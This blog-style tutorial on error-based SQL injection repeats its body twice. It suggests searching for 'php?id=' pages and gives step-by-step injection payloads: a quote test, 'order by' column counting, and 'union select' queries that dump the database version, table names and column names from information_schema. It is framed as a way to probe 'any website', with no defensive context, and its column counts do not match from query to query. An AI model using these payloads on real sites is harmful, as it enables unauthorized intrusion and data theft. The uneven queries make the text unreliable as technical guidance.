As said in the previous post about sql injection, there are 2 types of sql injection mainly. They are error based sql injection and Blind sql injection.
Error based sql injection can be performed on URL's, Forms etc of a website
We can search for web pages vulnerable to SQL injection using following search query
php?id=
Example: www.example.com/php?id=2
Enter single quote (') at the end of URL to test SQL injection vulnerability in the webpage.
www.example.com/php?id=2'
If it displays an error related to SQL in the webpage, it is vulnerable to SQL injection
If it shows an error then Append "order by 1--" in the URL.
www.example.com/php?id=2 order by 1--
Increase the number by 1 every time until webpage loads normally without any error.
We can even try the following technique to identify a number of columns.
php?id=6’ order by 3--+
For the url www.example.com/php?id=2 order by 7-- it shows an error, then confirm that the database has 6 columns in it.
Now let us identify vulnerable columns by appending below query to the URL.
union select (list of columns)--
Example: union select 1,2,3,4,5,6--
After entering it in the url if the system displays any numbers, then those columns are vulnerable and in the above example if it displays 3,4 then those columns are vulnerable.
To know the version of database server, replace column number with version ()
www.example.com/php?id=6 union select 1,2,3,version(),4,5,6--
To retrieve database information including table names.
php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
To extract the column names
php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=table name
So in this way you can check if any website is vulnerable to sql injection attacks. The cheat sheet for sql injection is here.
Error based sql injection can be performed on URL's, Forms etc of a website
We can search for web pages vulnerable to SQL injection using following search query
php?id=
Example: www.example.com/php?id=2
Enter single quote (') at the end of URL to test SQL injection vulnerability in the webpage.
www.example.com/php?id=2'
If it displays an error related to SQL in the webpage, it is vulnerable to SQL injection
If it shows an error then Append "order by 1--" in the URL.
www.example.com/php?id=2 order by 1--
Increase the number by 1 every time until webpage loads normally without any error.
We can even try the following technique to identify a number of columns.
php?id=6’ order by 3--+
For the url www.example.com/php?id=2 order by 7-- it shows an error, then confirm that the database has 6 columns in it.
Now let us identify vulnerable columns by appending below query to the URL.
union select (list of columns)--
Example: union select 1,2,3,4,5,6--
After entering it in the url if the system displays any numbers, then those columns are vulnerable and in the above example if it displays 3,4 then those columns are vulnerable.
To know the version of database server, replace column number with version ()
www.example.com/php?id=6 union select 1,2,3,version(),4,5,6--
To retrieve database information including table names.
php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
To extract the column names
php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=table name
So in this way you can check if any website is vulnerable to sql injection attacks. The cheat sheet for sql injection is here.
No comments:
Post a Comment